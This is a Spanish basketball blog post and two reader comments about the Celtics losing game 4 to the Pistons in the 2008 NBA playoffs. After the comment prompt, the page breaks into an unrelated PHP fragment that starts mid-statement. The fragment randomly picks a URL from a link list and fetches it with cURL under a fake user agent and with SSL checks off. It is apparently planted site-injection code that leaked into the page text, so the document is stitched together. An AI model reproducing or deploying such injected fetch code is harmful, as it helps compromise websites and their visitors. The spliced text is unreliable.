Volver a empezar (BOS 75 – DET 94)

27 de May de 2008 por telekoman

McDyess y Pierce luchando un balón por el sueloEs difícil ganar un partido en los playoffs de la NBA. Es más difícil ganarlo en cancha contraria, como está quedando en evidencia esta temporada. Es todavía más difícil ganar a equipos como Detroit o San antonio en playoffs. Pero es prácticamente imposible cuando tu porcentaje de tiro es un pírrico 31%. A medias entre la defensa de Detroit y la relajación tras haber conseguido recuperar el factor cancha, los Celtics plantearon ayer de nuevo un partido rácano en cancha contraria. La situación es todavía más sangrante si tenemos en cuenta que el partido estuvo más o menos igualado hasta el último cuarto gracias principalmente a la diferencia en las faltas pitadas a uno y otro equipo. Detroit por su parte volvió a tener uno de sus partidos buenos de playoffs, con un McDyess en plan estrella siendo el máximo anotador y reboteador del partido con 21 puntos y 16 rebotes. Junto a él el inefable Hamilton manteniendo su media de 20 puntos por partido.

La eliminatoria vuelve a estar empatada. Quedan muchas dudas por tanto por resolver al haber demostrado los dos equipos que son capaces de ganar en cancha contraria. La recuperación de Billups, lenta pero segura, la constancia de Hamilton y un banquillo algo más consistente que el de los Celtics (quien lo habría dicho al principio de la temporada) son las mejores señales para Detroit. La recuperación de Ray Allen (al menos durante el tercer partido), la constancia de Pierce y sobre todo de Garnett y la defensa son las bazas de Boston.

Comenta

2 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Ya no había más margen de error para Detroit tras la “inesperada” derrota del otro día. Una derrota más en Auburn Hills y ya podrían pensar en reservar los hoteles para las vacaciones de la semana que viene.
    Sí lo había, en cambio, para los Celtics, como ya lo apuntó Garnett tras el partido del Saturday Night Fever. Se podían permitir el lujo de jugar sin presión el cuarto, dijo él. Lamentablemente ya nos hemos acostumbrado al concepto de “sin presión” que tienen ellos. Traducido a nuestro idioma más o menos sería “derrota segura, sin paliativos, jugando como el ojete”

    El caso es que no sabemos si Garnett es un visionario que ya sabía lo que iba a pasar pero, anoche, al pobre le cayó la del pulpo. El juego interior de Detroit, como ya sucedió contra Dwight Howard, se conjuraron para amargarle la vida de todas las formas posibles. Si ya se puede esperar que Rasheed Wallace te plantee un partido perro, Big Ticket tardará en olvidar la que le hizo anoche (con 5 tapones) Sólo le faltaba el otro, Maxiell, con una defensa asfixiante y un pincho que pasará directamente a las recopilaciones históricas de jugadas defensivas (NOTA: obligado visionado) Apenas le dejaron llegar a un flojo 35% en tiro.
    Pero lo que no podría haberse imaginado nunca es que, a estas alturas de la vida, Antonio McDyess iba a rejuvenecer de golpe jugando el partido de su vida y, entre los 3 iban a regalarle un castigo combinado de 49 puntos como Pedro por su casa dentro de la difícil zona Céltica.

    Y es que anoche pintaban bastos para todo aquel que iba vestido de verde. 31,8% en tiro y 11,1% en triples… para no jugar con presión les costó bastante pasarla por dentro del aro.

    En la dirección, Billups sigue sin estar bien pero, al menos, renunciando a ser él mismo, invirtió todas sus fuerzas en dirigir correctamente al equipo. Excasas pérdidas de balón y buenos pases, lo mínimo que se le puede pedir a un base. Por su parte, Rodney Stuckey, hizo lo propio en los muchos minutos que tuvo que sustituirlo. Sin hacer un partido brillante, ofreció un buen encuentro al servicio de los otros. Da la impresión que hay buen relevo para Billups en ciernes.

    Una vez más se vuelve a Boston con un 2-2. El “camino de rosas” del Este le está costando la salud a más de uno.

      Citar

  2. xapa_croack dice:
    #2

    No deer stuckey no lo substituyo sino que jugo de 2 por que hamilton estaba cargado de faltas, y de 2 pierde bastante, Billups parece k juega filtrado esta muy mal penetrando.

    Los celtics aguantaron hasta el 3er cuarto por la cantidad de tiros libres que sacaron.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>